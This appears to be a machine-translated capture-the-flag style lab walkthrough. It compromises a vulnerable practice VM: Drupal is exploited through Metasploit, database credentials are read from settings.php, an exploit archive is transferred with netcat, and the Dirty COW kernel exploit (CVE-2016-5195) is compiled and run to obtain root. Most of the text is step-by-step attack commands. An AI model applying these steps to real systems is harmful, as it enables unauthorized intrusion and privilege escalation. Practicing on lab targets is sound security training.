introduce
Vulnerability number CVE-2016-5195
Vulnerability name : Dirty cow privilege escalation
Vulnerability hazard : Low-privileged users can use this vulnerability technology to achieve local privilege escalation on all versions of Linux systems and obtain root privileges.
Scope of impact : Linux kernel >=2.6.22 (released in 2007) has been affected since then and was not repaired until October 18, 2016
Link: Shooting range download address, extraction code
Link: Privilege escalation file download address, privilege escalation code zp3j
collect message
ifconfig
Check the local IP address.
nmap -sP 192.168.152.0/24
Scan the network segment and check the shooting range address.
nmap -A 192.168.152.129 -p 0-65535
Scan the port
and open the network address http://[ip]:1898. If this page appears, it means the shooting range is opened successfully.
dirb 网站地址
To scan the directory
, we use robots.txt to see if there are exploitable vulnerabilities. Check
The website contains drupal version information. We use msfconsole to check whether there are exploitable vulnerabilities.
Vulnerability recurrence
Msfconsole
#Search for exploitable vulnerabilities
search drupal
#Query vulnerabilities
use 1
#View vulnerabilities with serial number 1
show options
#View content that needs to be set #Use set to set
set RHOSTS 靶场地址
set RPSOST 靶场端口
run
#Run and discover vulnerabilities
shell
#Interact
python -c 'import pty; pty.spawn("/bin/bash")'
#Use Python for interactive shell
python -c 'import pty; pty.spawn("/bin/bash")'
cat settings.php
#View the contents
and get the account number and password
cd /home
of the database #Enter the /home directory and view existing accounts
SSH connection account tiago password Virgulino port 22 The connection is successful.
id
View the current user information
uname -a
. View the kernel version of the target machine.
Dirty Cow Power Elevation
Script link: Download address of privilege escalation file, privilege escalation code zp3j
kali tar -czvf aa.tar.gz CVE-2016-5195-master
#Compress the file.
The compressed name is aa.tar.gz, which needs to be passed to the target machine to perform privilege escalation. The target
machine : listens to aa on port 4444. The tar.gz file
nc -l 4444 > aa.tar.gz
kali transfers the aa.tar.gz file to
nc 192.168.152.129 4444 < aa.tar.gz
the target machine and decompresses the transferred aa.tar.gz tar -xzvf aa.tar.gz
#Enter
CVE-2016-5195-master
cd CVE-2016-5195-master
make
#New content appears dcow
./dcow
root password is dirtyCowFun
su
entered and the privilege escalation is successful.